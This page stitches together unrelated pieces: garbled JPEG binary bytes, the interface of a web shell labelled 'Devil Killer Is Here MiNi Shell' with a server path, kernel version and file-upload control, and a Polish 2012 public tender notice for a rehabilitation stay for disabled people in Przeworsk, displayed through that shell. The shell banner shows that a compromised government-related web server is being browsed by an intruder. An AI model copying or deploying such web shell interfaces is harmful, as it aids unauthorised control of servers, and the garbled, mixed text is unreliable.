JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120528/175230-N-2012.html

<p class="kh_header"><b>Przeworsk: Zorganizowanie i realizacja 1 turnusu rehabilitacyjnego usprawniająco - rekreacyjnego zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów   rehabilitacyjnych  (Dz. U.  z dnia 11 grudnia 2007r. Nr 230, poz. 1694) dla 42 osób, w tym 34 osoby niepełnosprawne i 8 opiekunów osób niepełnosprawnych w stopniu znacznym
i umiarkowanym oraz 1 opiekuna grupy w ramach projektu pn. Program aktywizacji społecznej w Powiecie Przeworskim realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Przeworsku w ramach Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 175230 - 2012; data zamieszczenia: 28.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Krakowska 11, 37-200 Przeworsk, woj. podkarpackie, tel. 16 649 09 10, faks 16 649 09 10.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i realizacja 1 turnusu rehabilitacyjnego usprawniająco - rekreacyjnego zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów   rehabilitacyjnych  (Dz. U.  z dnia 11 grudnia 2007r. Nr 230, poz. 1694) dla 42 osób, w tym 34 osoby niepełnosprawne i 8 opiekunów osób niepełnosprawnych w stopniu znacznym
i umiarkowanym oraz 1 opiekuna grupy w ramach projektu pn. Program aktywizacji społecznej w Powiecie Przeworskim realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Przeworsku w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i realizację 1 turnusu rehabilitacyjnego usprawniająco - rekreacyjnego zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007r. w sprawie turnusów   rehabilitacyjnych  (Dz. U.  z dnia 11 grudnia 2007r. Nr 230, poz. 1694) dla 42 osób, w tym 34 osoby niepełnosprawne i 8 opiekunów osób niepełnosprawnych w stopniu znacznym
i umiarkowanym oraz 1 opiekuna grupy w ramach projektu pn. Program aktywizacji społecznej w Powiecie Przeworskim realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Przeworsku w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie. Projekt współfinansowany ze środków UE  w ramach Europejskiego Funduszu Społecznego.
Turnus powinien rozpocząć się nie wcześniej niż od dnia 09 lipca 2012 roku a zakończyć nie później niż 31 lipca 2012 roku. Turnus obejmuje 14 dni pobytowych.
Zamawiający zastrzega, iż może ulec niewielkiej zmianie liczba uczestników oraz opiekunów. 

Wykonawca będący organizatorem turnusu zapewni dla każdego uczestnika turnusu:
1. realizację turnusu usprawniająco - rekreacyjnego dla osób niepełnosprawnych,
w szczególności z dysfunkcjami: 
narządu ruchu, 
narządu wzroku, 
układu krążenia, 
układu oddechowego, 
upośledzenie umysłowe, 
epilepsja, 
choroby psychiczne, 
schorzenia neurologiczne, 
choroby narządów wydzielania wewnętrznego, 
z cukrzycą.
2. kadrę gwarantującą prawidłową organizację i przeprowadzenie turnusu (w tym możliwość szybkiej konsultacji psychiatrycznej w razie potrzeby),
3. wykonanie usługi zgodnie z przepisami Rozporządzenia Ministra Pracy i Polityki
Społecznej z dnia 15 listopada 2007r. w sprawie turnusów rehabilitacyjnych (Dz. U. Nr 230 poz. 1694),
4. badanie lekarskie na początku i na końcu turnusu,
5. stałą opiekę pielęgniarską i korzystanie z opieki lekarskiej podczas turnusu (w tym możliwość szybkiej konsultacji psychiatrycznej w razie potrzeby),
6. 3 zabiegi rehabilitacyjne (dziennie) przez minimum 10 dni zabiegowych, uwzględniające aktualny stan zdrowia uczestnika turnusu rehabilitacyjnego,
7. bazę zabiegową zlokalizowaną w budynku zakwaterowania uczestników i opiekunów lub w budynku zlokalizowanym w bezpośrednim sąsiedztwie w ramach kompleksu budynków,
8. całodzienne wyżywienie w skład którego wchodzą: śniadanie, obiad, kolacja,
z zachowaniem diet wynikających z posiadanych schorzeń (w tym dietę cukrzycową dla około 3 osób i dietę lekkostrawną dla około 3 osób), dla wszystkich uczestników turnusu i ich opiekunów,
9. stołówkę zlokalizowaną w budynku zakwaterowania uczestników i opiekunów lub w budynku zlokalizowanym w bezpośrednim sąsiedztwie w ramach kompleksu budynków,
10. dokonanie rekompensaty za śniadanie w dniu rozpoczęcia turnusu dla każdego uczestnika turnusu i opiekuna, w formie wieczorku integracyjnego z poczęstunkiem, w ustalonym wspólnie z opiekunem grupy terminie, 
11. dokonanie rekompensaty za kolację w dniu zakończenia turnusu dla każdego uczestnika turnusu i opiekuna w formie zapewnienia suchego prowiantu na czas podróży,
12. zakwaterowanie wszystkich uczestników turnusu i opiekunów w jednym budynku, w pokojach zlokalizowanych w pobliżu siebie: 2-osobowych (21 pokoi) z pełnym węzłem sanitarnym tj. umywalka, prysznic, wc w każdym pokoju. Każdy pokój musi być wyposażony w jednoosobowe łóżka z pościelą, szafy ubraniowe, krzesła i stoliki, TV , radio oraz czajnik bezprzewodowy, sztućce, szklanki, talerzyki, 
13. zorganizowanie co najmniej dwóch ognisk z poczęstunkiem, na których będą serwowane z grilla kiełbasa, karkówka oraz pieczywo i napoje, dla wszystkich uczestników turnusu i opiekunów,
14. zorganizowanie co najmniej 3 wycieczek, w tym 1 autokarowej poza miejscowość, w której odbywa się turnus z uwzględnieniem wynajmu autokaru oraz wszystkich kosztów związanych ze zorganizowaniem wycieczki, dla wszystkich uczestników turnusu i ich opiekunów,
15.opłacenie opłaty uzdrowiskowej/klimatycznej za wszystkich uczestników turnusu   i   ich opiekunów, jeśli wymagać będzie tego lokalizacja ośrodka, 
16.ubezpieczenie NNW na kwotę nie niższą niż 10.000 zł na jedną osobę oraz ubezpieczenie OC na kwotę nie niższą niż 10.000 zł na jedną osobę oraz ubezpieczenie bagażu na kwotę nie niższą niż 1.200 zł na jedną osobę, obejmujące czas podróży oraz pobyt na turnusie, dla każdej osoby niepełnosprawnej,

Ponadto Wykonawca musi zapewnić:
17. nieodpłatny pobyt opiekuna grupy wyznaczonego przez Zamawiającego przez cały czas trwania turnusu wraz z jego zakwaterowaniem, wyżywieniem i opłatą uzdrowiskową/klimatyczną oraz transportem,
18. zakwaterowanie opiekuna grupy w pokoju 1-osobowym, z pełnym węzłem sanitarnym tj. umywalka, prysznic, wc. Pokój musi być wyposażony w jednoosobowe łóżka z pościelą, szafy ubraniowe, krzesła i stoliki, TV, radio oraz czajnik bezprzewodowy, sztućce, szklanki, talerzyki. Pokój ten musi być zlokalizowany w bezpośrednim sąsiedztwie pokoi, w których zakwaterowani będą uczestnicy turnusu i ich opiekunowie.  Opiekun to delegowany przez Zamawiającego pracownik PCPR. Jego pobyt ma zapewnić stały monitoring realizowanych usług oraz pomoc osobom niepełnosprawnym.
19. transport grupy z opiekunem z Przeworska do Ośrodka, w którym odbędzie się turnus oraz z powrotem po zakończeniu turnusu, z Ośrodka do Przeworska autobusem wyposażonym w wygodne fotele - uchylne do tyłu, klimatyzację, WC, barek, TV, radio CD, duże luki bagażowe, apteczkę. 

Wymagania dotyczące Ośrodka.
1.Ośrodek przyjmujący osoby niepełnosprawne na turnus rehabilitacyjny musi posiadać aktualny wpis do rejestru ośrodków, o którym mowa w § 17 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 r. w sprawie turnusów rehabilitacyjnych (Dz. U. z dnia 11 grudnia 2007r. Nr 230, poz. 1694). Zawiadomienie o wpisie do rejestru ośrodków powinno zawierać informację o rodzajach realizowanych turnusów rehabilitacyjnych w tym o turnusie rehabilitacyjnym usprawniająco - rekreacyjnym, w którym będą uczestniczyć osoby z następującymi dysfunkcjami lub schorzeniami: narządu ruchu, narządu wzroku, układu krążenia, układu oddechowego, upośledzenie umysłowe, epilepsja, choroby psychiczne, schorzenia neurologiczne, chorobami narządów wydzielania wewnętrznego, z cukrzycą. 
2. Wykonawca zobowiązany jest do realizacji przedmiotowego zadania w Ośrodku znajdującym się w Polsce w odległości nie większej niż 300 km od miasta Przeworsk.
3.Obiekt przeznaczony do organizacji i przeprowadzenia turnusu winien spełniać określone standardy zgodnie z cyt. wyżej rozporządzeniem, tj.: odpowiednia baza noclegowa i żywieniowa; zaplecze do realizacji programu turnusu oraz aktywnych form rehabilitacji, w tym prowadzenia zajęć mających na celu poprawę psychofizycznej sprawności uczestników turnusu i zajęć wypoczynkowych, zaplecze do przeprowadzania zabiegów fizjoterapeutycznych oraz innych zajęć wynikających z programu turnusu; zaplecze do realizacji zajęć kulturalno - oświatowych, zaplecze rekreacyjno - wypoczynkowe, gabinety lekarskie, zabiegowe. 
4. Baza zabiegowa musi znajdować się w tym samym budynku, w którym zakwaterowani będą uczestnicy turnusu i ich opiekunowie lub w budynku zlokalizowanym w bezpośrednim sąsiedztwie w ramach kompleksu budynków,
5.Ilość posiadanego sprzętu musi być adekwatna do ilości wykonywanych zabiegów dla uczestników turnusu.
6.Ośrodek winien mieć podpisaną umowę z lekarzem na świadczenie usług medycznych (uczestnikami turnusu są osoby niepełnosprawne).
7.Stołówka musi znajdować się w budynku, w którym zakwaterowani będą uczestnicy turnusu i ich opiekunowie lub w budynku zlokalizowanym w bezpośrednim sąsiedztwie w ramach kompleksu budynków,.
8.Przy ośrodku tj. w bezpośrednim jego otoczeniu powinno znajdować się miejsce do zorganizowania ognisk integracyjnych. 
9.Uczestnicy turnusu winni być usytuowani w pokojach blisko siebie w jednym budynku (realizowana będzie w ten sposób rehabilitacja społeczna i integracja osób niepełnosprawnych). Ośrodek, pokoje oraz łazienki powinny być czyste i zadbane.

Zamawiający zastrzega sobie prawo do dokonania wizji na terenie ośrodka zgłoszonego w dokumentach przetargowych celem określenia zgodności jego opisu ze stanem faktycznym. 

Wymagania dotyczące Organizatora.
Organizator turnusu rehabilitacyjnego musi posiadać aktualny wpis do rejestru organizatorów turnusów rehabilitacyjnych, o którym mowa w § 11 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia 15 listopada 2007 r. w sprawie turnusów rehabilitacyjnych (Dz. U. z dnia 11 grudnia 2007r. Nr 230, poz. 1694). Zawiadomienie o wpisie do rejestru organizatorów powinno zawierać informację o rodzajach realizowanych turnusów rehabilitacyjnych w tym o turnusie rehabilitacyjnym usprawniająco - rekreacyjnym, w którym będą uczestniczyć osoby z następującymi dysfunkcjami lub schorzeniami: narządu ruchu, narządu wzroku, układu krążenia, układu oddechowego, upośledzenie umysłowe, epilepsja, choroby psychiczne, schorzenia neurologiczne, chorobami narządów wydzielania wewnętrznego, z cukrzycą.

Zamawiający zastrzega również, iż do obowiązków Wykonawcy będzie należało:
niezwłoczne zawiadomienie Zamawiającego o każdym przypadku przerwania turnusu rehabilitacyjnego przez jego uczestnika,
wystawienie 14 dni po zakończeniu turnusu rehabilitacyjnego faktur na nazwisko każdego uczestnika turnusu obejmujących dofinansowanie ze środków PFRON na uczestnika/opiekuna, których płatnikiem będzie Zamawiający,
wystawienie 14 dni po zakończeniu turnusu rehabilitacyjnego faktur na nazwisko każdego uczestnika turnusu obejmujących dofinansowanie turnusu ze środków EFS (stanowiące różnicę pomiędzy wynagrodzeniem ofertowym za 1 uczestnika/opiekuna, a kwotą dofinansowania uczestnictwa w turnusie ze środków PFRON) których płatnikiem będzie Zamawiający,
wystawienie 14 dni po zakończeniu turnusu rehabilitacyjnego faktury za usługę transportową, której płatnikiem będzie Zamawiający,
przesłanie Zamawiającemu w terminie do 14 dni od zakończenia turnusu faktur i informacji o przebiegu turnusu rehabilitacyjnego oraz kserokopii polisy/polis NNW, OC i bagażu,
dokonanie zwrotu w wysokości 100% przekazanego dofinansowania ze środków PFRON w przypadku rezygnacji osoby niepełnosprawnej z uczestnictwa w turnusie przed jego rozpoczęciem lub stwierdzenia w wyniku kontroli rażących uchybień  w zakresie realizacji tego turnusu,
dokonanie zwrotu przekazanego dofinansowania ze środków PFRON w wysokości proporcjonalnej do liczby niewykorzystanych dni w przypadku skrócenia z przyczyn losowych pobytu osoby niepełnosprawnej na turnusie w wymiarze co najmniej połowy czasu trwania tego turnusu,
wynagrodzenie obejmujące wysokość dofinansowania ze środków EFS Wykonawca przelicza do rzeczywistej liczby dni pobytu uczestnika na turnusie,
umieszczenia informacji o źródle finansowania projektu oraz logotypów Programu Operacyjnego Kapitał Ludzki i Europejskiego Funduszu Społecznego zgodnych
z wytycznymi dotyczącymi oznaczania projektów w ramach PO KL wraz z nazwą projektu w miejscu zakwaterowania uczestników turnusu oraz w miejscach przeprowadzania zajęć w ramach turnusu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniajacych polegających na powtórzeniu tego samego rodzaju zamówień w trybie z wolnej ręki na zasadach określonych w art. 67 ust. 1 pkt 6 ustawy Pzp. do 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 55.24.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy Zamawiający uzna za spełniony jeżeli Wykonawca posiada aktualny wpis do rejestru organizatorów turnusów rehabilitacyjnych, o których mowa w rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 r. w sprawie turnusów rehabilitacyjnych (Dz. U. Nr 230, poz. 1964 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy Zamawiający uzna za spełniony jeżeli Wykonawca zrealizował w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie min. 3 usługi polegające na organizacji turnusu rehabilitacyjnego usprawniająco - rekreacyjnego zakres których obejmował rehabilitację usprawniająco - rekreacyjną  wykonanych na rzecz jednego lub kilku odbiorców o wartości  min. 60 000,00 zł każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy Zamawiający uzna za spełniony jeżeli Wykonawca  posiada aktualny wpis do rejestru ośrodków, o których mowa w rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 r. w sprawie turnusów rehabilitacyjnych (Dz. U. Nr 230, poz. 1964 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy Zamawiający uzna za spełniony jeżeli Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia min. 70 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane usługi oraz obiekt w którym zostanie zorganizowany turnus rehabilitacyjny odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca zobowiązany jest do załączenia do oferty Opisu warunków lokalowych oraz organizacyjno - technicznych  ośrodka  bądź innych materiałów informacyjnych dot. Ośrodka i oferowanych  w  ramach  turnusu  usług  w  zakresie umożliwiającym skonfrontowanie danych z wymogami określonymi w SIWZ wraz z programem turnusu rehabilitacyjnego</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli wykonawca, wskazując spełnienie warunków, o których mowa w pkt III.3 polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt III.4.2.
Zgodnie z art. 23 ust. 1 ustawy wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, składając następujące dokumenty: 
Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia składa oddzielne dokumenty wymienione w  pkt III.4.2.
Oświadczenie o ustanowieniu pełnomocnika do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;

Dokumenty, o których mowa w III.4.1 winni złożyć wspólnie na zasadzie sumowania potencjałów wykonawców występujących wspólnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
